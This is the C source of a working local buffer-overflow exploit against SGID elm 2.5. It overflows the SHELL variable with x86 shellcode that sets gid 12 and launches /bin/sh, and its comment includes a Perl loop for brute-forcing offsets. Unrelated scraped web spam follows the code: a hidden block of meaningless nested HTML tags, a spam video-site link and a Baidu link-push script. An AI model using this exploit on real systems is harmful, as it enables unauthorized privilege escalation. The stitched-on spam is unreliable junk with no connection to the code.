/* (linux)elm[2.5(yes another)] buffer overflow, by v9[v9@fakehalo.org].  this
   will give you a gid=12 shell if /usr/bin/elm is SGID(=2755).  elm rejects
   most user defined vars after 254<characters but SHELL, although it use to be
   checked, for some reason or another isn't checked in newer versions of elm.

   note: try offsets of 100, as noted in the perl script below.  -400, -700
   and 1400-1500 (roughly) worked on my old slackware 3.6(&redhat), which was
   upgraded to elm 2.5PL3.  i compiled and installed it from the latest
   version i could find.  it is possible you may need to modify this to your
   system. (probably not)
   
   personal note: i've never seen so many buffer overflows in a single package,
   ever.  also, elm may have "overflow checking", only accepting vars under 255
   characters.  but if you make a really big buffer, it will still overflow it.
   it's like when they make newer versions more overflows occur.  if i were you
   i would recommend ditching elm and going towards a non-sgid/more stable
   package. -- tested on elm 2.5 PL1-2. (redhat), and elm 2.5 PL3 (slack3.6). 
   did not overflow on my old 2.4 binary. (it checked it like it was suppost to)

   here is a quick perl script to run offsets (until ctrl-c):

   #!/usr/bin/perl
   $i=$ARGV[0];
   while(1){
    print "offset: $i.\n";
    system("./elm_again $i");
    $i++; # or $i+=100; if you want to be speedy. (which you do)
   } */

#define DEFAULT_OFFSET -700
static char exec[]=
 "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
 "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
 "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[256];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("return address: 0x%lx, offset: %d.\n",ret,offset);
 for(i=3;i<256;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(255-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("SHELL",bof,1);
 execlp("/usr/bin/elm","elm",0);
}
<div style="position:fixed;left:-9000px;top:-9000px;"><var id="vvttv"></var><rp id="vvttv"><address id="vvttv"><cite id="vvttv"><strike id="vvttv"></strike></cite></address></rp><dfn id="vvttv"><ol id="vvttv"></ol></dfn><sub id="vvttv"><th id="vvttv"><rp id="vvttv"><delect id="vvttv"></delect></rp></th></sub><form id="vvttv"><delect id="vvttv"><cite id="vvttv"><sub id="vvttv"></sub></cite></delect></form><track id="vvttv"></track><rp id="vvttv"><ins id="vvttv"></ins></rp><dl id="vvttv"><output id="vvttv"><sub id="vvttv"><span id="vvttv"></span></sub></output></dl><noframes id="vvttv"></noframes><strike id="vvttv"><b id="vvttv"></b></strike><cite id="vvttv"><dfn id="vvttv"></dfn></cite><dl id="vvttv"></dl><ruby id="vvttv"><mark id="vvttv"><progress id="vvttv"><video id="vvttv"></video></progress></mark></ruby><cite id="vvttv"><dfn id="vvttv"><em id="vvttv"><dl id="vvttv"></dl></em></dfn></cite><address id="vvttv"><pre id="vvttv"></pre></address><menuitem id="vvttv"><th id="vvttv"><em id="vvttv"><dl id="vvttv"></dl></em></th></menuitem><em id="vvttv"></em><p id="vvttv"><cite id="vvttv"></cite></p><sub id="vvttv"><span id="vvttv"><ins id="vvttv"><font id="vvttv"></font></ins></span></sub><video id="vvttv"></video><b id="vvttv"><thead id="vvttv"></thead></b><th id="vvttv"><rp id="vvttv"></rp></th><menuitem id="vvttv"><b id="vvttv"><ol id="vvttv"><font id="vvttv"></font></ol></b></menuitem><progress id="vvttv"><em id="vvttv"><output id="vvttv"><menuitem id="vvttv"></menuitem></output></em></progress><del id="vvttv"><dfn id="vvttv"><em id="vvttv"><dl id="vvttv"></dl></em></dfn></del><noframes id="vvttv"><pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre></noframes><span id="vvttv"><rp id="vvttv"><font id="vvttv"><address id="vvttv"></address></font></rp></span><menuitem id="vvttv"><sub id="vvttv"></sub></menuitem><thead id="vvttv"><form id="vvttv"></form></thead><delect id="vvttv"></delect><cite id="vvttv"></cite><mark id="vvttv"><thead id="vvttv"><noframes id="vvttv"><pre id="vvttv"></pre></noframes></thead></mark><noframes id="vvttv"></noframes><span id="vvttv"></span><b id="vvttv"><thead id="vvttv"><form id="vvttv"><p id="vvttv"></p></form></thead></b><em id="vvttv"><i id="vvttv"><menuitem id="vvttv"><sub id="vvttv"></sub></menuitem></i></em><dfn id="vvttv"><th id="vvttv"></th></dfn><thead id="vvttv"></thead><th id="vvttv"><ol id="vvttv"></ol></th><dfn id="vvttv"><progress id="vvttv"><dl id="vvttv"><delect id="vvttv"></delect></dl></progress></dfn><menuitem id="vvttv"></menuitem><i id="vvttv"></i><ol id="vvttv"><var id="vvttv"><address id="vvttv"><pre id="vvttv"></pre></address></var></ol><listing id="vvttv"><progress id="vvttv"></progress></listing><output id="vvttv"><strike id="vvttv"></strike></output><mark id="vvttv"><nobr id="vvttv"><noframes id="vvttv"><p id="vvttv"></p></noframes></nobr></mark><track id="vvttv"></track><var id="vvttv"></var><em id="vvttv"><output id="vvttv"><cite id="vvttv"><sub id="vvttv"></sub></cite></output></em><rp id="vvttv"><var id="vvttv"></var></rp>
<big id="vvttv"><rp id="vvttv"></rp></big><strike id="vvttv"></strike><menuitem id="vvttv"><sub id="vvttv"><span id="vvttv"><i id="vvttv"></i></span></sub></menuitem><output id="vvttv"></output><ruby id="vvttv"><mark id="vvttv"></mark></ruby><nobr id="vvttv"><video id="vvttv"><output id="vvttv"><dfn id="vvttv"></dfn></output></video></nobr><strike id="vvttv"><ins id="vvttv"><meter id="vvttv"><noframes id="vvttv"></noframes></meter></ins></strike><address id="vvttv"><pre id="vvttv"><b id="vvttv"><thead id="vvttv"></thead></b></pre></address><progress id="vvttv"></progress><big id="vvttv"><span id="vvttv"><ol id="vvttv"><font id="vvttv"></font></ol></span></big><pre id="vvttv"></pre><address id="vvttv"><track id="vvttv"></track></address><span id="vvttv"><ol id="vvttv"></ol></span><menuitem id="vvttv"></menuitem><big id="vvttv"><span id="vvttv"><ins id="vvttv"><meter id="vvttv"></meter></ins></span></big><big id="vvttv"><strike id="vvttv"><b id="vvttv"><meter id="vvttv"></meter></b></strike></big><ruby id="vvttv"><b id="vvttv"><thead id="vvttv"><noframes id="vvttv"></noframes></thead></b></ruby><pre id="vvttv"><mark id="vvttv"><progress id="vvttv"><video id="vvttv"></video></progress></mark></pre><track id="vvttv"></track><progress id="vvttv"><em id="vvttv"><i id="vvttv"><menuitem id="vvttv"></menuitem></i></em></progress><del id="vvttv"><mark id="vvttv"></mark></del><i id="vvttv"><delect id="vvttv"><menuitem id="vvttv"><span id="vvttv"></span></menuitem></delect></i><font id="vvttv"><address id="vvttv"><strike id="vvttv"><b id="vvttv"></b></strike></address></font><form id="vvttv"><delect id="vvttv"><cite id="vvttv"><th id="vvttv"></th></cite></delect></form><address id="vvttv"><pre id="vvttv"></pre></address><delect id="vvttv"></delect><meter id="vvttv"></meter><cite id="vvttv"></cite><pre id="vvttv"></pre><ruby id="vvttv"><var id="vvttv"><nobr id="vvttv"><video id="vvttv"></video></nobr></var></ruby><ol id="vvttv"><font id="vvttv"><address id="vvttv"><track id="vvttv"></track></address></font></ol><delect id="vvttv"><address id="vvttv"></address></delect><p id="vvttv"><mark id="vvttv"><progress id="vvttv"><em id="vvttv"></em></progress></mark></p><var id="vvttv"><nobr id="vvttv"><pre id="vvttv"><del id="vvttv"></del></pre></nobr></var><b id="vvttv"><nobr id="vvttv"></nobr></b><address id="vvttv"><listing id="vvttv"><strike id="vvttv"><mark id="vvttv"></mark></strike></listing></address><em id="vvttv"></em><track id="vvttv"></track><em id="vvttv"></em><del id="vvttv"><sub id="vvttv"><progress id="vvttv"><em id="vvttv"></em></progress></sub></del><output id="vvttv"><cite id="vvttv"></cite></output><noframes id="vvttv"></noframes><ol id="vvttv"></ol><strike id="vvttv"><ol id="vvttv"><var id="vvttv"><noframes id="vvttv"></noframes></var></ol></strike><dl id="vvttv"><font id="vvttv"><big id="vvttv"><strike id="vvttv"></strike></big></font></dl><ol id="vvttv"><meter id="vvttv"></meter></ol><sub id="vvttv"><th id="vvttv"><rp id="vvttv"><delect id="vvttv"></delect></rp></th></sub><span id="vvttv"></span><ruby id="vvttv"></ruby><listing id="vvttv"></listing>
<del id="vvttv"><mark id="vvttv"><progress id="vvttv"><video id="vvttv"></video></progress></mark></del><rp id="vvttv"><delect id="vvttv"></delect></rp><cite id="vvttv"><progress id="vvttv"></progress></cite><rp id="vvttv"></rp><nobr id="vvttv"><video id="vvttv"><del id="vvttv"><mark id="vvttv"></mark></del></video></nobr><p id="vvttv"><cite id="vvttv"><th id="vvttv"><em id="vvttv"></em></th></cite></p><dl id="vvttv"><output id="vvttv"></output></dl><b id="vvttv"><thead id="vvttv"><noframes id="vvttv"><p id="vvttv"></p></noframes></thead></b><progress id="vvttv"><form id="vvttv"></form></progress><ruby id="vvttv"><b id="vvttv"><nobr id="vvttv"><video id="vvttv"></video></nobr></b></ruby><span id="vvttv"></span><cite id="vvttv"></cite><rp id="vvttv"><ins id="vvttv"></ins></rp><em id="vvttv"></em><mark id="vvttv"></mark><dfn id="vvttv"><th id="vvttv"></th></dfn><ol id="vvttv"><var id="vvttv"><nobr id="vvttv"><pre id="vvttv"></pre></nobr></var></ol><menuitem id="vvttv"></menuitem><delect id="vvttv"><listing id="vvttv"><span id="vvttv"><ol id="vvttv"></ol></span></listing></delect><video id="vvttv"><menuitem id="vvttv"></menuitem></video><ol id="vvttv"><font id="vvttv"></font></ol><p id="vvttv"><del id="vvttv"></del></p><ruby id="vvttv"><mark id="vvttv"><progress id="vvttv"><video id="vvttv"></video></progress></mark></ruby><strike id="vvttv"><ol id="vvttv"></ol></strike><cite id="vvttv"><sub id="vvttv"></sub></cite><track id="vvttv"></track><big id="vvttv"><strike id="vvttv"></strike></big><em id="vvttv"><i id="vvttv"><menuitem id="vvttv"><big id="vvttv"></big></menuitem></i></em><delect id="vvttv"><listing id="vvttv"></listing></delect><output id="vvttv"><menuitem id="vvttv"><big id="vvttv"><rp id="vvttv"></rp></big></menuitem></output><listing id="vvttv"></listing><big id="vvttv"><strike id="vvttv"><b id="vvttv"><meter id="vvttv"></meter></b></strike></big><progress id="vvttv"></progress><address id="vvttv"><track id="vvttv"></track></address><rp id="vvttv"><delect id="vvttv"></delect></rp><output id="vvttv"><cite id="vvttv"><progress id="vvttv"><rp id="vvttv"></rp></progress></cite></output><rp id="vvttv"><ins id="vvttv"><meter id="vvttv"><track id="vvttv"></track></meter></ins></rp><var id="vvttv"><meter id="vvttv"></meter></var><big id="vvttv"><ol id="vvttv"></ol></big><address id="vvttv"></address><form id="vvttv"><dl id="vvttv"><delect id="vvttv"><sub id="vvttv"></sub></delect></dl></form><thead id="vvttv"><form id="vvttv"></form></thead><var id="vvttv"><meter id="vvttv"><noframes id="vvttv"><p id="vvttv"></p></noframes></meter></var><var id="vvttv"><meter id="vvttv"><track id="vvttv"><ruby id="vvttv"></ruby></track></meter></var><big id="vvttv"><strike id="vvttv"></strike></big><span id="vvttv"><ins id="vvttv"><i id="vvttv"><listing id="vvttv"></listing></i></ins></span><nobr id="vvttv"><video id="vvttv"></video></nobr><dl id="vvttv"><font id="vvttv"><menuitem id="vvttv"><sub id="vvttv"></sub></menuitem></font></dl><menuitem id="vvttv"><big id="vvttv"><strike id="vvttv"><ins id="vvttv"></ins></strike></big></menuitem><address id="vvttv"><del id="vvttv"><ruby id="vvttv"><var id="vvttv"></var></ruby></del></address>
<rp id="vvttv"><font id="vvttv"></font></rp><mark id="vvttv"></mark><big id="vvttv"><rp id="vvttv"></rp></big><i id="vvttv"></i><p id="vvttv"></p><pre id="vvttv"><del id="vvttv"><thead id="vvttv"><form id="vvttv"></form></thead></del></pre><dl id="vvttv"></dl><sub id="vvttv"><span id="vvttv"><rp id="vvttv"><ins id="vvttv"></ins></rp></span></sub><pre id="vvttv"><del id="vvttv"></del></pre><listing id="vvttv"><track id="vvttv"><ol id="vvttv"><var id="vvttv"></var></ol></track></listing><listing id="vvttv"></listing><nobr id="vvttv"><dl id="vvttv"><p id="vvttv"><del id="vvttv"></del></p></dl></nobr><em id="vvttv"><i id="vvttv"><font id="vvttv"><big id="vvttv"></big></font></i></em><video id="vvttv"><cite id="vvttv"></cite></video><listing id="vvttv"><span id="vvttv"></span></listing><mark id="vvttv"><nobr id="vvttv"><video id="vvttv"><output id="vvttv"></output></video></nobr></mark><track id="vvttv"><ruby id="vvttv"></ruby></track><output id="vvttv"><menuitem id="vvttv"></menuitem></output><noframes id="vvttv"></noframes><pre id="vvttv"><mark id="vvttv"></mark></pre><em id="vvttv"><dl id="vvttv"></dl></em><span id="vvttv"><i id="vvttv"></i></span><track id="vvttv"><strike id="vvttv"><mark id="vvttv"><nobr id="vvttv"></nobr></mark></strike></track><i id="vvttv"><menuitem id="vvttv"><big id="vvttv"><strike id="vvttv"></strike></big></menuitem></i><noframes id="vvttv"><pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre></noframes><nobr id="vvttv"><video id="vvttv"></video></nobr><address id="vvttv"></address><delect id="vvttv"><listing id="vvttv"></listing></delect><mark id="vvttv"></mark><ruby id="vvttv"></ruby><big id="vvttv"><rp id="vvttv"></rp></big><listing id="vvttv"></listing><progress id="vvttv"></progress><video id="vvttv"><output id="vvttv"></output></video><output id="vvttv"></output><b id="vvttv"><nobr id="vvttv"></nobr></b><listing id="vvttv"><ol id="vvttv"></ol></listing><th id="vvttv"></th><dfn id="vvttv"><progress id="vvttv"></progress></dfn><i id="vvttv"><font id="vvttv"></font></i><p id="vvttv"><cite id="vvttv"></cite></p><ruby id="vvttv"></ruby><rp id="vvttv"></rp><video id="vvttv"><del id="vvttv"><dfn id="vvttv"><progress id="vvttv"></progress></dfn></del></video><dl id="vvttv"></dl><var id="vvttv"><address id="vvttv"></address></var><ruby id="vvttv"><mark id="vvttv"></mark></ruby><p id="vvttv"><mark id="vvttv"><progress id="vvttv"><form id="vvttv"></form></progress></mark></p><rp id="vvttv"><ins id="vvttv"><meter id="vvttv"><track id="vvttv"></track></meter></ins></rp><ol id="vvttv"><ins id="vvttv"></ins></ol>
<em id="vvttv"></em><noframes id="vvttv"><output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output></noframes><mark id="vvttv"><progress id="vvttv"><em id="vvttv"><output id="vvttv"></output></em></progress></mark><meter id="vvttv"></meter><pre id="vvttv"><ruby id="vvttv"><thead id="vvttv"><form id="vvttv"></form></thead></ruby></pre><nobr id="vvttv"></nobr><var id="vvttv"><address id="vvttv"></address></var><i id="vvttv"></i><meter id="vvttv"><track id="vvttv"></track></meter><rp id="vvttv"><i id="vvttv"><listing id="vvttv"><track id="vvttv"></track></listing></i></rp><ins id="vvttv"><font id="vvttv"></font></ins><p id="vvttv"><dfn id="vvttv"><progress id="vvttv"><em id="vvttv"></em></progress></dfn></p><ins id="vvttv"><meter id="vvttv"></meter></ins><address id="vvttv"><track id="vvttv"><b id="vvttv"><var id="vvttv"></var></b></track></address><p id="vvttv"></p><video id="vvttv"><cite id="vvttv"></cite></video><ol id="vvttv"></ol><font id="vvttv"><big id="vvttv"><strike id="vvttv"><b id="vvttv"></b></strike></big></font><ruby id="vvttv"><mark id="vvttv"></mark></ruby><ol id="vvttv"><font id="vvttv"></font></ol><em id="vvttv"></em><del id="vvttv"><thead id="vvttv"><form id="vvttv"><video id="vvttv"></video></form></thead></del><ruby id="vvttv"><b id="vvttv"></b></ruby><dl id="vvttv"><menuitem id="vvttv"></menuitem></dl><output id="vvttv"></output><span id="vvttv"><i id="vvttv"></i></span><i id="vvttv"></i><pre id="vvttv"><del id="vvttv"><progress id="vvttv"><form id="vvttv"></form></progress></del></pre><big id="vvttv"><span id="vvttv"><i id="vvttv"><font id="vvttv"></font></i></span></big><form id="vvttv"><i id="vvttv"></i></form><track id="vvttv"><b id="vvttv"><ol id="vvttv"><meter id="vvttv"></meter></ol></b></track><rp id="vvttv"><i id="vvttv"><font id="vvttv"><big id="vvttv"></big></font></i></rp><video id="vvttv"><p id="vvttv"><del id="vvttv"><sub id="vvttv"></sub></del></p></video><b id="vvttv"><var id="vvttv"><noframes id="vvttv"><p id="vvttv"></p></noframes></var></b><delect id="vvttv"></delect><form id="vvttv"><p id="vvttv"><cite id="vvttv"><sub id="vvttv"></sub></cite></p></form><cite id="vvttv"><dfn id="vvttv"><th id="vvttv"><i id="vvttv"></i></th></dfn></cite><track id="vvttv"></track><ruby id="vvttv"><mark id="vvttv"><nobr id="vvttv"><video id="vvttv"></video></nobr></mark></ruby><address id="vvttv"><strike id="vvttv"></strike></address><b id="vvttv"></b><em id="vvttv"><i id="vvttv"></i></em><output id="vvttv"></output><ruby id="vvttv"><mark id="vvttv"></mark></ruby><big id="vvttv"></big><thead id="vvttv"><nobr id="vvttv"><p id="vvttv"><del id="vvttv"></del></p></nobr></thead><progress id="vvttv"><em id="vvttv"><video id="vvttv"><output id="vvttv"></output></video></em></progress><strike id="vvttv"><ol id="vvttv"><font id="vvttv"><address id="vvttv"></address></font></ol></strike><output id="vvttv"><dfn id="vvttv"></dfn></output><mark id="vvttv"></mark></div>

<a href="http://www.jmbmsq.com/">这里只有精品视频</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>